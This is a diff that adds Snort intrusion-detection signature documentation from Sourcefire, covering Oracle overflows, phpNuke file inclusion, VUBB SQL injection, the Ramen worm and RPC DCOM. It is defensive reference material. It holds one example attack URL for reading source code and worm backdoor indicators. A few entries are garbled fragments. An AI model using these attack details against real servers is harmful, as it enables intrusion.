+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2847.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2847
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000369.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000369
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_forumauth.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_forumauth.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000533.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000533
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VUBB" application running on a webserver. Access to the 
+file "functions.php" with SQL commands being passed as the "email" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "email" parameter in the "functions.php" script used by 
+the "VUBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VUBB
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2151.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 2151
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in a php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in a ttCMS or ttForum PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL in ttCMS or ttForum PHP applications, the script is processed and executed with the privileges of the user running the webserver. This is due to poor checking of user supplied variables in the News.php and Install.php scripts.
+
+The vendor for these applications states that exploitation is not possible. However, proof of concepts for these issues have been circulated.
+
+--
+Affected Systems:
+Any host using ttCMS or ttForum.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script via either News.php or Install.php.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7542
+http://www.securityfocus.com/bid/7543
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000365.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000365
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "index.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2667.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 
+2667
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+ping.asp.
+
+-- 
+Impact: 
+Possible Denial of Service (DoS)
+
+--
+Detailed Information:
+The script ping.asp allows a user to use the system ping command to send
+ICMP echo request messages to a third party from the web server hosting
+the script.
+
+This script does not properly sanitize user input and may be used as a
+tool in a DoS attack against that third party server.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can supply the address of a target host and pass parameters
+to the ping command via the web interface to cause a possible exhaustion
+of resources on a target host to cause the DoS condition.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script ping.asp
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SecurityFocus mailing list:
+http://online.securityfocus.com/archive/82/275088
+
+--
--- /dev/null
+++ b/doc/signatures/506.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+506
+
+--
+Summary:
+This event is generated when the Ramen worm attempts to retrieve a copy of the worm from a host.
+
+--
+Impact:
+Severe. The Ramen worm is already on the host and is currently propagating from the source ip address.
+
+--
+Detailed Information:
+The Ramen worm is a set of exploits that uses synscan to grab banners before exploiting new hosts.
+
+It scans automatically for random class B IP addresses and attacks them if possible. Another feature is the automatic defacement of index(.htm/html) files. The exploits are used to attack vulnerable WuFTPd servers, vulnerable RPC services (statd format string exploit) or vulnerable LPRng services. The RPC statd exploit binds suid shell on port 39168 which is used for further host compromise.
+
+--
+Affected Systems:
+Various Linux systems
+
+--
+Attack Scenarios:
+The RPC, WuFTP or LPRng printer spooler service was vulnerable and attacked by Ramen worm. The host is then back-doored on port 39168 and propagates to other vulnerable hosts in a class B/C network.
+
+--
+Ease of Attack:
+Simple. This is Worm activity
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+- rm -rf /usr/src/.poop (it contains the worm files)
+- rm -rf /tmp/ramen.tar.gz (Ramen worm files with exploits and shellscripts)
+- Delete line "/user/src/.poop/start*.sh" in /etc/rc.d/rc.sysinit
+- ps -Af | grep "asp" (Search PID of asp service port webserver)
+- kill -9 %PID_you_just_saw%
+- rm /sbin/asp (backdoor webserver, which binds to 27374)
+- Service startup:
+ - Using Inetd (Redhat 6): remove line "asp stream tcp nowait root" form /etc/inetd.conf and restart inetd service
+ - Using XInet.d (Redhat 7): rm -rf /etc/xinet.d/asp
+- Update /etc/hosts.deny because Ramen worm deletes the file or modifies it
+- Check index(.htm/html) files since they may be modified by the worm
+- Update WuFTPd server, NFS service, LPRng service
+- Reboot the host
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1237.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1237
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1886.txt
@@ -0,0 +1,69 @@
+Rule:
+
+
+--
+Sid: 
+
+1886
+
+-- 
+Summary: 
+This rule has been placed in deleted.rules
+
+-- 
+Impact: 
+
+attacker might have gained an ability to execute commands remotely on the system.
+
+--
+Detailed Information:
+
+This signature triggers when a UNIX "id" command is used to confirm
+the user name of the currently logged in user over any unencrypted
+connection. Such connection can be either a legitimate telnet
+connection or a result of spawning a shell on FTP, POP3, SMTP or other
+port as a consequence of network exploit. The string "uid=" and
+"(apache)" is an output of an "id" command indicating that the user
+has "apache" account privileges, typically used by the web server
+process.  Seeing such a response indicates that some user connected
+over the network to a target web server and likely exploited the web
+server to launch a shell.
+
+--
+Attack Scenarios: 
+
+a buffer overflow exploit against the WWW server
+results in "/bin/sh" being executed. An automated script performing an
+attack, checks for the success of the exploit via an "id" command.
+
+-- 
+Ease of Attack: 
+
+this post-attack behavior can accompany different attacks
+
+-- 
+False Positives: 
+
+the signature will trigger if a legitimate system administrator executes the "id" command over the telnet connection which uses one of the web ports, as defined in snort.conf
+
+--
+False Negatives: 
+
+not known
+
+-- 
+Corrective Action: 
+
+investigate the server for signs of compromise, run
+the integrity checking software, look for other IDS alerts involving
+the same IP addresses.
+
+--
+Contributors: 
+
+Anton Chuvakin <anton@chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3170.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3170
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/439.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+
+Sid:
+439
+
+--
+
+Summary:
+This event is generated when an ICMP Type 19 Code 0 (ICMP Reserved for Security) datagram is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 19 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 19 is not defined for use and is not expected network activity.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 19 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3085.txt
@@ -0,0 +1,59 @@
+Rules:
+
+--
+Sid:
+3085
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with AOL Instant Messenger (AIM) goaway message.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+AIM is instant messaging software supplied by AOL Time Warner. A malicious
+URL offered in an AIM message or web page that sends an AIM client an overly
+long AIM "Away" message can cause a buffer overflow on a vulnerable client.
+This can permit the execution of arbitrary code on the client host.
+
+--
+Affected Systems:
+AOL Instant Messenger 5.5, 5.5.3415 Beta, 5.5.3595
+
+--
+Attack Scenarios:
+An attacker can send an overly long AIM "Away" message or a user could be
+enticed to view a site that embeds such a message.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+A Metasploit attack that exploits this vulnerability uses an HTTP port of
+8080.  Other HTTP ports can be used for this attack as well.
+
+--
+Corrective Action:
+Upgrade to the most current nonaffected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+iDefense:
+http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
+--
--- /dev/null
+++ b/doc/signatures/2091.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2091
+
+--
+Summary:
+server is attempted.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in a component used by the Microsoft Internet 
+Information Server 5.0 implementation of WebDAV. A specially crafted 
+overly long URI when processed by the server, triggers a buffer overflow
+in ntdll.dll which results in a system compromise of the targeted host.
+
+The exploit only affects versions of IIS 5.0 running on Microsoft 
+Windows 2000 prior to service pack 3. WebDAV is enabled by default on 
+that platform.
+
+vulnerabilities using the security scanner nessus.
+
+--
+Affected Systems:
+Microsoft Internet Information Server 5.0 WebDAV on Windows 2000 prior 
+to Service Pack 3.
+
+--
+Attack Scenarios:
+The attacker is using nessus.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch or service pack.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=11412
+
+CERT:
+http://www.cert.org/advisories/CA-2003-09.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0109
+
+Bugtraq:
+http://www.securityfocus.com/bid/7116
+
+Microsoft Corporation:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms03-007.asp
+http://www.microsoft.com/security/security_bulletins/ms03-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/810.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+810
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1054.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+
+Sid:
+1054
+
+--
+
+Summary:
+Someone attempted to gain unauthorized access to web application source code
+through a BEA WebLogic Server or Apache Tomcat JSP vulnerability.
+
+--
+Impact:
+An attacker may have been able to read the source code to a web application.
+Sometimes web application source code contains highly sensitive information,
+such as database passwords and information concerning backend setups.  This
+could be a prelude to further attacks.
+
+--
+Detailed Information:
+Some versions of BEA WebLogic and Apache Tomcat web servers contain
+vulnerabilities that can allow an attacker to read the source code to
+web applications.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Attacker sends a simple URL like the following:
+http://www.example.com/index.js%70
+
+--
+Ease of Attack:
+Very simple handcrafted URL.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a web request was being done.  Try to
+determine what the requested file was, and determine
+from the web server's configuration whether it was a threat or not
+(e.g., whether the requested file even existed and whether the web
+server was vulnerable to such attacks).
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2906.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2906
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3344.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3344
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1326.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1326
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with root privileges. Denial 
+of Service (DoS) on certain network devices.
+
+--
+Detailed Information:
+A flaw in the CRC32 compensation attack detection code may result in 
+arbitrary code execution with the privileges of the user running the SSH
+daemon (usually root).
+
+Some Netscreen devices may suffer a Denial of Service.
+
+Affected Systems:
+	OpenSSH versions prior to 2.2
+	Multiple Cisco network devices
+	Multiple Netscreen network devices
+	SSH Secure Communications prior to 1.2.31
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted large SSH packets to 
+cause the overflow and present the opportunity to write values to memory
+locations.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+Analysis by David Dittrich:
+http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3360.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3360
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3005.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3005
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
